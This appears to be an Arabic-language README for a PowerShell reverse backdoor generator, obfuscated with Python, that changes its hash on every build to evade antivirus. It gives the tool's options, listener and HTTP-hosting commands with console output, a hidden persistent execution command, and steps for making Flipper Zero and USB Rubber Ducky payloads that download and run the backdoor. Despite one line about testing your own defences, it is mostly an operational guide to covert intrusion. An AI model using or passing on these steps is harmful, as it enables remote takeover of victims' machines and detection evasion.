
باب خلفي عكسي مكتوب بلغة PowerShell ومموه باستخدام Python. يقوم بتوليد حمولات لأجهزة الاختراق الشائعة مثل Flipper Zero وHak5 USB Rubber Ducky، ويغير توقيعه بعد كل بناء للمساعدة في تجنب برامج مكافحة الفيروسات.
/******************************************************************************
أداة باب خلفي عكسي مكتوبة بلغة PowerShell ومشوشرة باستخدام Python، مما يوفر بصمة جديدة بعد كل بناء لتجنب الاكتشاف. تمتلك الأداة القدرة على إنشاء حمولات لأجهزة الاختراق الشائعة مثل Flipper Zero وHak5 USB Rubber Ducky. استخدم هذه الأداة لاختبار دفاعات نظامك ضد تقنيات الهجوم المتقدمة.
usage: listen.py [-h] [--ip-address IP_ADDRESS] [--port PORT] [--random] [--out OUT] [--verbose] [--delay DELAY] [--flipper FLIPPER] [--ducky]
[--server-port SERVER_PORT] [--payload PAYLOAD] [--list--payloads] [-k KEYBOARD] [-L] [-H]
Powershell Backdoor Generator
options:
-h, --help show this help message and exit
--ip-address IP_ADDRESS, -i IP_ADDRESS
IP Address to bind the backdoor too (default: 192.168.X.XX)
--port PORT, -p PORT Port for the backdoor to connect over (default: 4444)
--random, -r Randomizes the outputed backdoor's file name
--out OUT, -o OUT Specify the backdoor filename (relative file names)
--verbose, -v Show verbose output
--delay DELAY Delay in milliseconds before Flipper Zero/Ducky-Script payload execution (default:100)
--flipper FLIPPER Payload file for flipper zero (includes EOL conversion) (relative file name)
--ducky Creates an inject.bin for the http server
--server-port SERVER_PORT
Port to run the HTTP server on (--server) (default: 8080)
--payload PAYLOAD USB Rubber Ducky/Flipper Zero backdoor payload to execute
--list--payloads List all available payloads
-k KEYBOARD, --keyboard KEYBOARD
Keyboard layout for Bad Usb/Flipper Zero (default: us)
-A, --actually-listen
Just listen for any backdoor connections
-H, --listen-and-host
Just listen for any backdoor connections and host the backdoor directory
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --verbose
[*] Encoding backdoor script
[*] Saved backdoor backdoor.ps1 sha1:32b9ca5c3cd088323da7aed161a788709d171b71
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
سيتم إنشاء ملف باسم backdoor.ps1 في دليل العمل الحالي.
تم اختباره على Windows 11 و Windows 10 و Kali Linux. لتشغيله كنافذة مخفية مع استمرارية الوصول، اتبع الدليل
powershell.exe -File backdoor.ps1 -ExecutionPolicy Unrestricted
┌──(drew㉿kali)-[/home/drew/Documents]
└─PS> ./backdoor.ps1
عند استخدام أي من هذه الهجمات، ستقوم بفتح خادم HTTP يستضيف الباب الخلفي. بمجرد استرداد الباب الخلفي، سيتم إيقاف خادم HTTP.
ما يلي سينشئ ملفًا باسم powershell_backdoor.txt، والذي عند تشغيله على Flipper سيجلب الباب الخلفي من جهاز الكمبيوتر الخاص بك عبر HTTP وينفذه.
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --flipper powershell_backdoor --payload execute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
ضع الملف النصي الذي حددته (مثل: powershell_backdoor.txt) في جهاز Flipper Zero الخاص بك. عند تنفيذ الحمولة، سيتم تنزيل وتنفيذ backdoor.ps1.
فيما يلي شرح لكيفية إنشاء ملف inject.bin لـ Hak5 USB Rubber Ducky
C:\Users\DrewQ\Desktop\powershell-backdoor-main> python .\listen.py --ducky --payload BindAndExecute
[*] Started HTTP server hosting file: http://192.168.0.223:8989/backdoor.ps1
[*] Starting Backdoor Listener 192.168.0.223:4444 use CTRL+BREAK to stop
سيتم وضع ملف باسم inject.bin في دليل العمل الحالي. Java مطلوبة لهذه الميزة. عند تنفيذ الحمولة، سيتم تنزيل وتنفيذ backdoor.ps1.
لتشفير payload.txt إلى inject.bin لهجمات USB Rubber Ducky، أستخدم encoder.jar الذي أنشأه .
فيما يلي تجزئة sha1 لـ backdoor.ps1 بعد 5 عمليات بناء.
1e158f02484e5c58d74c1507a1773392ffacfca2
6d18230a419195d0f77519abc0238768956cdd58
558a8cbac40239c9e6660a45cc8fc5d02b5057d7
caf4d0c8424eceb960d5f5c526e83ecd485c4ac9
947b57824917842d79f9cbcac8a795aa7c2f8a49